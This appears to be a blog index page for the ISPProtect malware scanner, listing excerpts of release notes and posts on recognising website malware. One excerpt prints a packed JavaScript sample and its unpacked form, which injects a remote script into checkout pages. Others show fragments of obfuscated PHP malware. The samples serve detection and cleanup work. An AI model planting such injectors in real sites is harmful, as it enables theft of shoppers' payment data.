An essential component of the analysis and cleanup of websites infected with malware is viewing and evaluating the log files. However, even here there are things to consider that might seem odd at first glance. Let’s say you find a
ISPProtect version 1.32.3 with FoxAuto web shell detection
Version 1.32.3 of ISPProtect released today now also detects FoxAuto including different variants. FoxAuto is a collection of tools that can be used to download and execute additional malicious scripts via vulnerabilities in a website (WordPress, its plugins, Joomla, etc.).
Malware Scanner 1.31.2 with new features
Today we released version 1.31.2 of ISPProtect Malware Scanner. To update your ISPProtect instance, use ispp_scan --update. New signatures We have added several new signatures and heuristics to the scanner. As a result, even more potentially malicious PHP scripts are
New BETA version 1.30.0 with deep scan feature
Today we have released the beta version 1.30.0 of the ISPProtect Malware Scanner. To update your ISPProtect instance to the beta version, use ispp_scan --update --channel=beta. Be aware that this beta version might still contain bugs. Deep scan Some attackers
New version with extended database scan
With today’s version 1.29.0 of ISPProtect we have made some improvements to the code. The database scan has also been enhanced. In the standard mode using the parameter --db-scan only a small subset of the malware heuristics will be applied
New version scans for files in .well-known directories
As the Zscaler team recently reported, malware, phishing pages and viruses are frequently found in the .well-known directories on web servers. These directories are used, for example, to confirm domain ownership when a certificate is issued. The widely used “Let’s
Checking the WordPress settings after cleaning up a hacked or infected website
A few days ago I was hired to clean up a hacked WordPress page that was affected by the security issue in the WP GDPR Compliance plugin. The attacker created a new admin user and changed/uploaded some files to WordPress. For that
New major release of ISPProtect Malware Scanner
Today we are proud to announce our next major release 1.25.0. What has changed? We introduced a new scan level 1.1 to the scan that searches for PHP code hidden inside of image file names. It is a wide-spread tactic
New version 1.24.13 with new malware heuristics
Today we released the new version 1.24.13 of ISPProtect malware scanner. It includes some new malware signatures and new heuristics for dynamic malware code of which we want to show you a new type of malware that is hard to
New version 1.24.7 released
Today we released version 1.24.7 of ISPProtect. The new version contains new heuristics to recognize further malicious code. Below we take a closer look at a malicious code snippet. $a = base64_decode($b); for($i = 0; $i < strlen($a); $i++){ $a[$i]
New malware heuristics added
Today we released a new version of ISPProtect that contains improved malware heuristics. It focuses on malware that tries to hide itself or the files it creates by setting file modification times to some point in the past. E.g.: <?php touch('/path/to/file', time()
ISPProtect malware scanner 1.23.0 released – unpacking JavaScript
Today we released version 1.23.0 of our malware scanning tool. With this release we added a feature to “unpack” some JavaScripts that were minified. For example:
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1.4=5(){6((2 7(\'8|9|a\')).b(1.c)){$$(\'d\')[0].e(2 f(\'g\',{h:\'i/j\',k:\'l://m.n.o/p/3/q/r.3\'}))}}',28,28,'|window|new|js|onload|function|if|RegExp|onepage|checkout|onestep|test|location|head|appendChild|Element|script|type|text|javascript|src|https|boutique|postedecoute|ca|media|shipping|ups'.split('|'),0,{}));
will be unpacked to
window.onload=function(){if((new RegExp('onepage|checkout|onestep')).test(window.location)){$$('head')[0].appendChild(new Element('script',{type:'text/javascript',src:'https://boutique.postedecoute.ca/media/js/shipping/ups.js'}))}}
New version 1.21.1 – and malware analysis
Today we released version 1.21.1 of our malware scanner ISPProtect. It adds further improvements and new signatures for even better malware recognition. With this blog post we want to show you a crypted, let’s say creative, type of malware.
ISPProtect malware scanner version 1.19.0 – speed improvements
Today we released version 1.19.0 of the ISPProtect malware scanner. For this release we focussed on new malware signatures and a further improvement of scanning speed in level 2. We managed to lower the scan time to less than 50%
ISPProtect 1.13.0 released – new heuristics and settings
Today we released the brand new version 1.13.0 of our malware scanner ISPProtect. We added a lot of new signatures and heuristics that address more than 20 types of new malware. In addition, to provide more flexibility, we implemented a
New version 1.9.4 with PHP 7 support and WordPress plugin scan
Today we released version 1.9.4 of the ISPProtect malware scanner. The scanner can now be run on servers with PHP version 7.0. In addition, we added a new feature to scan all WordPress installations on the server for outdated plugins.
ISPProtect Web Scan via FTP
Today we released our new ISPProtect service. Now you can scan your web space via FTP. This service targets web hosting customers that don’t have SSH access to their website and cannot run our downloadable version of ISPProtect. All data
PHP malware – recognizing malicious content part 2
In the first part of this article series we showed you a simple form of PHP malware: the base64 encoded eval. Today we’ll have a look at another form of malicious PHP code. Escaped characters (hex codes
Introducing the ISPProtect BanDaemon
We recently released our new ISPProtect product: the ISPProtect BanDaemon. It is free to use for all our customers that own a valid 12-month license for the ISPProtect Scanner – but we also offer a 30-day trial for all other users.
Recognizing malware content in your PHP files
In this article we want to show you some examples of malware code. Sometimes it is easy to decide whether a piece of code is malicious, sometimes it’s not. Malware with eval and base64_decode This form of malware is one